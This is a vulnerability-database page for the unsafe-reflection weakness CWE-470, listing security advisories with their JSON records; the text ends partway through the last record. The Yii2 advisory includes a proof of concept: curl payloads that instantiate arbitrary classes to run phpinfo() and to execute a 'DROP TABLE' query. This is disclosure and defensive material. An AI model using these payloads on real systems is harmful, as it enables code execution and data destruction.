CWE-470
AllowedUse of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
Abstraction: Base · Status: Draft
The product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.
111 vulnerabilities reference this CWE, most recent first.
GHSA-8G5Q-MP2W-J766
Vulnerability from github – Published: 2024-01-30 09:30 – Updated: 2024-01-30 09:30Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, FR Configurator2 all versions, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 all versions, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to execute a malicious code by RPC with a path to a malicious library while connected to the products.
{
"affected": [],
"aliases": [
"CVE-2023-6943"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-30T09:15:47Z",
"severity": "CRITICAL"
},
"details": "Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027) vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, FR Configurator2 all versions, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 all versions, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to execute a malicious code by RPC with a path to a malicious library while connected to the products.",
"id": "GHSA-8g5q-mp2w-j766",
"modified": "2024-01-30T09:30:34Z",
"published": "2024-01-30T09:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6943"
},
{
"type": "WEB",
"url": "https://jvn.jp/vu/JVNVU95103362"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-02"
},
{
"type": "WEB",
"url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-020_en.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8G7P-XH7P-947J
Vulnerability from github – Published: 2025-05-14 15:31 – Updated: 2025-08-27 15:33In Progress® Telerik® UI for AJAX, versions 2011.2.712 to 2025.1.218, an unsafe reflection vulnerability exists that may lead to an unhandled exception resulting in a crash of the hosting process and denial of service.
{
"affected": [],
"aliases": [
"CVE-2025-3600"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-14T14:15:29Z",
"severity": "HIGH"
},
"details": "In Progress\u00ae Telerik\u00ae UI for AJAX, versions 2011.2.712 to 2025.1.218, an unsafe reflection vulnerability exists that may lead to an unhandled exception resulting in a crash of the hosting process and denial of service.",
"id": "GHSA-8g7p-xh7p-947j",
"modified": "2025-08-27T15:33:13Z",
"published": "2025-05-14T15:31:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3600"
},
{
"type": "WEB",
"url": "https://www.telerik.com/products/aspnet-ajax/documentation/knowledge-base/kb-security-unsafe-reflection-cve-2025-3600"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8WJ8-CFXR-9374
Vulnerability from github – Published: 2025-11-13 22:22 – Updated: 2025-11-13 22:22Description of Vulnerability:
An issue in AWS Wrappers for Amazon Aurora PostgreSQL may allow for privilege escalation to rds_superuser role. A low privilege authenticated user can create a crafted function that could be executed with permissions of other Amazon Relational Database Service (RDS) users.
AWS recommends that customers upgrade to the following version: AWS NodeJS Wrapper to v2.0.1.
Source of Vulnerability Report:
Allistair Ishmael Hakim allistair.hakim@gmail.com
Affected products & versions:
AWS NodeJS Wrapper < 2.0.1.
Platforms:
MacOS/Windows/Linux
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "aws-advanced-nodejs-wrapper"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-13T22:22:37Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Description of Vulnerability: \nAn issue in AWS Wrappers for Amazon Aurora PostgreSQL may allow for privilege escalation to rds_superuser role. A low privilege authenticated user can create a crafted function that could be executed with permissions of other Amazon Relational Database Service (RDS) users.\n\nAWS recommends that customers upgrade to the following version: AWS NodeJS Wrapper to v2.0.1.\n\n\n### Source of Vulnerability Report:\nAllistair Ishmael Hakim [allistair.hakim@gmail.com](mailto:allistair.hakim@gmail.com)\n\n\n### Affected products \u0026 versions: \nAWS NodeJS Wrapper \u003c 2.0.1.\n\n\n### Platforms: \nMacOS/Windows/Linux",
"id": "GHSA-8wj8-cfxr-9374",
"modified": "2025-11-13T22:22:37Z",
"published": "2025-11-13T22:22:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aws/aws-advanced-nodejs-wrapper/security/advisories/GHSA-8wj8-cfxr-9374"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-advanced-nodejs-wrapper/pull/574"
},
{
"type": "PACKAGE",
"url": "https://github.com/aws/aws-advanced-nodejs-wrapper"
},
{
"type": "WEB",
"url": "https://github.com/aws/aws-advanced-nodejs-wrapper/releases/tag/2.0.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "AWS Advanced NodeJS Wrapper: Privilege Escalation in Aurora PostgreSQL instance"
}
GHSA-C2RV-HWQM-WJPG
Vulnerability from github – Published: 2026-06-02 12:31 – Updated: 2026-07-09 21:19Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache Calcite.
This issue affects Apache Calcite: from 1.5.0 before 1.42.
Users are recommended to upgrade to version 1.42, which fixes the issue.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.calcite:calcite-core"
},
"ranges": [
{
"events": [
{
"introduced": "1.5.0"
},
{
"fixed": "1.42.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46718"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-09T21:19:28Z",
"nvd_published_at": "2026-06-02T10:16:25Z",
"severity": "MODERATE"
},
"details": "Use of Externally-Controlled Input to Select Classes or Code (\u0027Unsafe Reflection\u0027) vulnerability in Apache Calcite.\n\nThis issue affects Apache Calcite: from 1.5.0 before 1.42.\n\nUsers are recommended to upgrade to version 1.42, which fixes the issue.",
"id": "GHSA-c2rv-hwqm-wjpg",
"modified": "2026-07-09T21:19:28Z",
"published": "2026-06-02T12:31:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46718"
},
{
"type": "WEB",
"url": "https://github.com/apache/calcite/commit/5855cfa14d8038e2a123ff6ce9722edce0e0cc25"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/calcite"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/CALCITE-7532"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/9s37svo343w5ck1ovh478lkzcqk4949v"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/06/01/7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apache Calcite is Vulnerable to Use of Externally-Controlled Input to Select Classes"
}
GHSA-C473-VF2F-6X9M
Vulnerability from github – Published: 2024-10-09 15:32 – Updated: 2024-10-09 15:32In Progress Telerik Report Server versions prior to 2024 Q3 (10.2.24.924), a remote code execution attack is possible through object injection via an insecure type resolution vulnerability.
{
"affected": [],
"aliases": [
"CVE-2024-8015"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-09T15:15:17Z",
"severity": "CRITICAL"
},
"details": "In Progress Telerik Report Server versions prior to 2024 Q3 (10.2.24.924), a remote code execution attack is possible through object injection via an insecure type resolution vulnerability.",
"id": "GHSA-c473-vf2f-6x9m",
"modified": "2024-10-09T15:32:21Z",
"published": "2024-10-09T15:32:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8015"
},
{
"type": "WEB",
"url": "https://docs.telerik.com/report-server/knowledge-base/insecure-type-resolution-cve-2024-8015"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-C8Q4-9H32-2WW8
Vulnerability from github – Published: 2026-06-22 20:43 – Updated: 2026-06-22 20:43Impact
There's an unsafe YAML processing vulnerability that bypasses safe deserialization. This impacts users when when performing: * CloudFormation deployments * CloudFoundry Baking
The usage of a non-safe constructor use allows arbitrary loading of Java classes leading to RCE.
Patches
2025.3.3, 2026.0.3 and 2025.4.4.
Workarounds
Disable the CloudFormation system and cloudfoundry baking operations.
Resources
Join Spinnaker on Slack for more information!
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "io.spinnaker.rosco:rosco-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2025.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "io.spinnaker.orca:orca-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2025.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "io.spinnaker.rosco:rosco-core"
},
"ranges": [
{
"events": [
{
"introduced": "2025.4.0"
},
{
"fixed": "2025.4.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "io.spinnaker.rosco:rosco-core"
},
"ranges": [
{
"events": [
{
"introduced": "2026.0.0"
},
{
"fixed": "2026.0.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "io.spinnaker.orca:orca-core"
},
"ranges": [
{
"events": [
{
"introduced": "2025.4.0"
},
{
"fixed": "2025.4.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "io.spinnaker.orca:orca-core"
},
"ranges": [
{
"events": [
{
"introduced": "2026.0.0"
},
{
"fixed": "2026.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44795"
],
"database_specific": {
"cwe_ids": [
"CWE-470",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T20:43:37Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\nThere\u0027s an unsafe YAML processing vulnerability that bypasses safe deserialization. This impacts users when when performing:\n* CloudFormation deployments\n* CloudFoundry Baking\n\nThe usage of a non-safe constructor use allows arbitrary loading of Java classes leading to RCE.\n\n### Patches\n 2025.3.3, 2026.0.3 and 2025.4.4.\n\n### Workarounds\nDisable the CloudFormation system and cloudfoundry baking operations.\n\n### Resources\nJoin Spinnaker on Slack for more information!",
"id": "GHSA-c8q4-9h32-2ww8",
"modified": "2026-06-22T20:43:37Z",
"published": "2026-06-22T20:43:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/spinnaker/spinnaker/security/advisories/GHSA-c8q4-9h32-2ww8"
},
{
"type": "PACKAGE",
"url": "https://github.com/spinnaker/spinnaker"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Spinnaker has uon-safe yaml deserialization, allowing RCE when using specific types"
}
GHSA-CJCC-P67M-7QXM
Vulnerability from github – Published: 2024-06-02 22:30 – Updated: 2025-04-01 23:13Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.
Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.
Impact
With some effort malicious code can be injected executed which might be anything ranging from deleting files to dropping database tables
Patches
Not yet patched.
Workarounds
No Work around available
References
Reported Here
in case the link is dead, here is the full description
Description
Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.
Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.
Depending on the installed dependencies various kind of attacks are possible.
Proof of Concept
A PoC application was created using composer create-project, as specified in the getting started.
Yii JSON parser was enabled in the configuration:
'parsers' => [ 'application/json' => 'yii\web\JsonParser' ]
A vulnerable controller was added:
<?php
namespace app\controllers;
use yii\base\Component;
use yii\web\Controller;
class ExploitableController extends Controller
{
public function beforeAction($action): bool
{
// Needed only to simplify the PoC
$this->enableCsrfValidation = false;
return parent::beforeAction($action);
}
public function actionVulnerable(): string
{
$fields = $this->request->post();
$myComponent = new Component();
foreach ($fields as $key => $value) {
$myComponent->$key = $value;
}
return "";
}
}
Executing phpinfo()
Following command stores the content of phpinfo() inside info.html:
curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable > info.html
It leverages the fact that GuzzleHttp\Psr7\FnStream class executes call_user_func($this->_fn_close) inside __destruct(). This class is a default dependency.
Executing arbitrary MySQL queries (blind execution)
If the application is connected to a MySQL database it is possible to exploit the PDO class to execute arbitrary SQL queries:
curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"\\PDO", "__construct()": ["mysql:host=127.0.0.1;dbname=test", "test", "test", {"1002": "DROP TABLE test"}]}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable
Notice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior), however the query is executed, even if we can't receive any output from it. If the query fails we might see a PDO error message (i.e. "Table 'test.foo' doesn't exist"), depending on the app configuration.
Impact
It is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it looks that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing to an anonymous user to gain admin access, with an easy exploit).
The consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.
Occurrences
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "yiisoft/yii2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.49.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-4990"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2024-06-02T22:30:39Z",
"nvd_published_at": "2025-03-20T10:15:32Z",
"severity": "HIGH"
},
"details": "Yii2 supports attaching Behaviors to Components by setting properties having the format `\u0027as \u003cbehaviour-name\u003e\u0027`.\n\nInternally this is done using the `__set()` magic method. If the value passed to this method is not an instance of the `Behavior` class, a new object is instantiated using `Yii::createObject($value)`. However, there is no validation check that verifies that `$value` is a valid `Behavior` class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.\n\n### Impact\nWith some effort malicious code can be injected executed which might be anything ranging from deleting files to dropping database tables\n\n### Patches\nNot yet patched.\n\n### Workarounds\nNo Work around available\n\n### References\nReported [Here](https://huntr.com/bounties/4fbdd965-02b6-42e4-b57b-f98f93415b8f?token=3bcfc5266870680af19a26170b8dbf3750e3b593ce192da8eaa6a03f96b99b52c419e15768c56f23991dc50003aa1a9e3cb3f1f9321e18bd506d68a9f937cd5b7ca90fb47967df22c8768c0c48f7206f36b583464af7e44bf93eecc5398a2764b98e02cf8e280397785106db16e4197951554eb9b9c46649f4339e2f413cf6a0197ab2e0) \n\nin case the link is dead, here is the full description\n\n# Description\n\nYii2 supports attaching Behaviors to Components by setting properties having the format `\u0027as \u003cbehaviour-name\u003e\u0027`.\n\nInternally this is done using the `__set()` magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using `Yii::createObject($value)`. However, there is no validation check that verifies that `$value` is a valid Behavior class name or configuration. An attacker that can control the content of the `$value` variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.\n\nDepending on the installed dependencies various kind of attacks are possible.\n\n# Proof of Concept\n\nA PoC application was created using `composer create-project`, as specified in the [getting started](https://www.yiiframework.com/doc/guide/2.0/en/start-installation).\n\nYii JSON parser was enabled in the configuration:\n\n```php\n\u0027parsers\u0027 =\u003e [ \u0027application/json\u0027 =\u003e \u0027yii\\web\\JsonParser\u0027 ]\n\n```\n\nA vulnerable controller was added:\n\n```php\n\u003c?php\n\nnamespace app\\controllers;\n\nuse yii\\base\\Component;\nuse yii\\web\\Controller;\n\nclass ExploitableController extends Controller\n{\n public function beforeAction($action): bool\n {\n // Needed only to simplify the PoC\n $this-\u003eenableCsrfValidation = false;\n return parent::beforeAction($action);\n }\n\n public function actionVulnerable(): string\n {\n $fields = $this-\u003erequest-\u003epost();\n $myComponent = new Component();\n foreach ($fields as $key =\u003e $value) {\n $myComponent-\u003e$key = $value;\n }\n return \"\";\n }\n}\n\n```\n\n## Executing phpinfo()\n\nFollowing command stores the content of `phpinfo()` inside info.html:\n\n```bash\ncurl -XPOST -H \"Content-Type: application/json\" -d \u0027{\"as hack\": {\"__class\":\"GuzzleHttp\\\\Psr7\\\\FnStream\", \"__construct()\": [[]], \"_fn_close\": \"phpinfo\"}}\u0027 http://localhost:8080/index.php?r=exploitable%2Fvulnerable \u003e info.html\n\n```\n\nIt leverages the fact that `GuzzleHttp\\Psr7\\FnStream` class executes `call_user_func($this-\u003e_fn_close)` inside `__destruct()`. This class is a default dependency.\n\n## Executing arbitrary MySQL queries (blind execution)\n\nIf the application is connected to a MySQL database it is possible to exploit the `PDO` class to execute arbitrary SQL queries:\n\n```bash\ncurl -XPOST -H \"Content-Type: application/json\" -d \u0027{\"as hack\": {\"__class\":\"\\\\PDO\", \"__construct()\": [\"mysql:host=127.0.0.1;dbname=test\", \"test\", \"test\", {\"1002\": \"DROP TABLE test\"}]}}\u0027 http://localhost:8080/index.php?r=exploitable%2Fvulnerable\n\n```\n\nNotice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior), however the query is executed, even if we can\u0027t receive any output from it. If the query fails we might see a PDO error message (i.e. \"Table \u0027test.foo\u0027 doesn\u0027t exist\"), depending on the app configuration.\n\n# Impact\n\nIt is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it looks that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing to an anonymous user to gain admin access, with an easy exploit).\n\nThe consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.\n\n# Occurrences\n\n[Component.php L191](https://github.com/yiisoft/yii2/blob/2.0.48/framework/base/Component.php#L191)",
"id": "GHSA-cjcc-p67m-7qxm",
"modified": "2025-04-01T23:13:58Z",
"published": "2024-06-02T22:30:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/yiisoft/yii2/security/advisories/GHSA-cjcc-p67m-7qxm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4990"
},
{
"type": "WEB",
"url": "https://github.com/yiisoft/yii2/pull/20183"
},
{
"type": "WEB",
"url": "https://github.com/yiisoft/yii2/commit/628d406bfafb80fc32147837888c0057d89a021e"
},
{
"type": "WEB",
"url": "https://github.com/yiisoft/yii2/commit/62d081f18c3602d09e7d075bba3a0ca5c313f0b4"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2024-4990.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/yiisoft/yii2"
},
{
"type": "WEB",
"url": "https://github.com/yiisoft/yii2/blob/master/framework/CHANGELOG.md#2050-may-30-2024"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/4fbdd965-02b6-42e4-b57b-f98f93415b8f"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Unsafe Reflection in base Component class in yiisoft/yii2"
}
GHSA-CWXJ-RR6W-M6W7
Vulnerability from github – Published: 2026-03-13 20:02 – Updated: 2026-03-13 20:02Impact
Since version 1.4.0, Scrapy respects the Referrer-Policy response header to decide whether and how to set a Referer header on follow-up requests.
If the header value looked like a valid Python import path, Scrapy would import the referenced object and call it, assuming it referred to a referrer policy class (for example, scrapy.spidermiddlewares.referer.DefaultReferrerPolicy) and attempting to instantiate it to handle the Referer header.
A malicious site could exploit this by setting Referrer-Policy to a path such as sys.exit, causing Scrapy to import and execute it and potentially terminate the process.
Patches
Upgrade to Scrapy 2.14.2 (or later).
Workarounds
If you cannot upgrade to Scrapy 2.14.2, consider the following mitigations.
- Disable the middleware: If you don't need the
Refererheader on follow-up requests, setREFERER_ENABLEDtoFalse. - Set headers manually: If you do need a
Referer, disable the middleware and set the header explicitly on the requests that require it. - Set
referrer_policyin request metadata: If disabling the middleware is not viable, set thereferrer_policyrequest meta key on all requests to prevent evaluating preceding responses'Referrer-Policy. For example:
Request(
url,
meta={
"referrer_policy": "scrapy.spidermiddlewares.referer.DefaultReferrerPolicy",
},
)
Instead of editing requests individually, you can:
- implement a custom spider middleware that runs before the built-in referrer policy middleware and sets the
referrer_policymeta key; or - set the meta key in start requests and use the scrapy-sticky-meta-params plugin to propagate it to follow-up requests.
If you want to continue respecting legitimate Referrer-Policy headers while protecting against malicious ones, disable the built-in referrer policy middleware by setting it to None in SPIDER_MIDDLEWARES and replace it with the fixed implementation from Scrapy 2.14.2.
If the Scrapy 2.14.2 implementation is incompatible with your project (for example, because your Scrapy version is older), copy the corresponding middleware from your Scrapy version, apply the same patch, and use that as a replacement.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.14.1"
},
"package": {
"ecosystem": "PyPI",
"name": "Scrapy"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "2.14.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-13T20:02:36Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\n\nSince version 1.4.0, Scrapy respects the `Referrer-Policy` response header to decide whether and how to set a `Referer` header on follow-up requests.\n\nIf the header value looked like a valid Python import path, Scrapy would import the referenced object and call it, assuming it referred to a referrer policy class (for example, `scrapy.spidermiddlewares.referer.DefaultReferrerPolicy`) and attempting to instantiate it to handle the `Referer` header.\n\nA malicious site could exploit this by setting `Referrer-Policy` to a path such as `sys.exit`, causing Scrapy to import and execute it and potentially terminate the process.\n\n### Patches\n\nUpgrade to Scrapy 2.14.2 (or later).\n\n### Workarounds\n\nIf you cannot upgrade to Scrapy 2.14.2, consider the following mitigations.\n\n- **Disable the middleware:** If you don\u0027t need the `Referer` header on follow-up requests, set [`REFERER_ENABLED`](https://docs.scrapy.org/en/latest/topics/spider-middleware.html#referer-enabled) to `False`.\n- **Set headers manually:** If you do need a `Referer`, disable the middleware and set the header explicitly on the requests that require it.\n- **Set `referrer_policy` in request metadata:** If disabling the middleware is not viable, set the [`referrer_policy`](https://docs.scrapy.org/en/latest/topics/spider-middleware.html#referrer-policy) request meta key on all requests to prevent evaluating preceding responses\u0027 `Referrer-Policy`. For example:\n\n```python\nRequest(\n url,\n meta={\n \"referrer_policy\": \"scrapy.spidermiddlewares.referer.DefaultReferrerPolicy\",\n },\n)\n```\n\nInstead of editing requests individually, you can:\n\n- implement a custom [spider middleware](https://docs.scrapy.org/en/latest/topics/spider-middleware.html) that runs before the built-in referrer policy middleware and sets the `referrer_policy` meta key; or\n- set the meta key in start requests and use the [scrapy-sticky-meta-params](https://github.com/heylouiz/scrapy-sticky-meta-params) plugin to propagate it to follow-up requests.\n\nIf you want to continue respecting legitimate `Referrer-Policy` headers while protecting against malicious ones, disable the built-in referrer policy middleware by setting it to `None` in [`SPIDER_MIDDLEWARES`](https://docs.scrapy.org/en/latest/topics/settings.html#std-setting-SPIDER_MIDDLEWARES) and replace it with the fixed implementation from Scrapy 2.14.2.\n\nIf the Scrapy 2.14.2 implementation is incompatible with your project (for example, because your Scrapy version is older), copy the corresponding middleware from your Scrapy version, apply the same patch, and use that as a replacement.",
"id": "GHSA-cwxj-rr6w-m6w7",
"modified": "2026-03-13T20:02:36Z",
"published": "2026-03-13T20:02:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/scrapy/scrapy/security/advisories/GHSA-cwxj-rr6w-m6w7"
},
{
"type": "WEB",
"url": "https://github.com/scrapy/scrapy/commit/945b787a263586cb5803c01c6da57daad8997ae5"
},
{
"type": "PACKAGE",
"url": "https://github.com/scrapy/scrapy"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Scrapy: Arbitrary Module Import via Referrer-Policy Header in RefererMiddleware"
}
GHSA-CX2H-XJFW-V87Q
Vulnerability from github – Published: 2022-09-07 00:01 – Updated: 2022-09-10 00:00In MtkEmail, there is a possible escalation of privilege due to fragment injection. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07216598; Issue ID: ALPS07216598.
{
"affected": [],
"aliases": [
"CVE-2022-26469"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-09-06T18:15:00Z",
"severity": "HIGH"
},
"details": "In MtkEmail, there is a possible escalation of privilege due to fragment injection. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07216598; Issue ID: ALPS07216598.",
"id": "GHSA-cx2h-xjfw-v87q",
"modified": "2022-09-10T00:00:35Z",
"published": "2022-09-07T00:01:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26469"
},
{
"type": "WEB",
"url": "https://corp.mediatek.com/product-security-bulletin/September-2022"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CX4M-2P55-RW7J
Vulnerability from github – Published: 2026-05-04 18:30 – Updated: 2026-05-08 17:53Arbitrary Class Instantiation via Model Manifest in Apache OpenNLP ExtensionLoader
Versions Affected: before 2.5.9, before 3.0.0-M3
Description:
The ExtensionLoader.instantiateExtension(Class, String) method loads a class by its fully-qualified name via Class.forName() and invokes its no-arg constructor, with the class name sourced from the manifest.properties entry of a model archive. The existing isAssignableFrom check correctly rejects classes that are not subtypes of the expected extension interface (BaseToolFactory for factory=, ArtifactSerializer for serializer-class-*), but the check runs after Class.forName() has already loaded and initialized the named class.
Class.forName() with default initialization semantics executes the target class's static initializer before returning, so an attacker who can supply a crafted model archive can cause the static initializer of any class on the classpath to run during model loading, regardless of whether that class passes the subsequent type check.
Exploitation requires a class with attacker-useful side effects in its static initializer (for example, JNDI lookup, outbound network I/O, or filesystem access) to be present on the classpath, so this is not a drop-in remote code execution; however, the attack surface grows as third-party model distribution becomes more common (community model repositories, Hugging Face-style sharing), where users routinely load model files from origins they do not control. A secondary, narrower vector affects deployments that ship legitimate BaseToolFactory or ArtifactSerializer subclasses with side-effecting no-arg constructors: a malicious manifest can name such a class and force its constructor to run during model load.
Mitigation:
- 2.x users should upgrade to 2.5.9.
- 3.x users should upgrade to 3.0.0-M3.
Note: The fix introduces a package-prefix allowlist that is consulted before Class.forName() is invoked, so the static initializer of a disallowed class is never executed. Classes under the opennlp. prefix remain permitted by default. Deployments that load models referencing factories or serializers outside opennlp.* must opt those packages in, either programmatically via ExtensionLoader.registerAllowedPackage(String) before the first model load, or by setting the OPENNLP_EXT_ALLOWED_PACKAGES system property to a comma-separated list of allowed package prefixes.
Users who cannot upgrade immediately should ensure that all model files are sourced from trusted origins and should audit their classpath for classes with side-effecting static initializers or constructors, particularly any that perform JNDI lookups, network requests, or filesystem operations during class initialization.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.opennlp:opennlp-tools"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.opennlp:opennlp-tools"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0-M1"
},
{
"fixed": "3.0.0-M3"
}
],
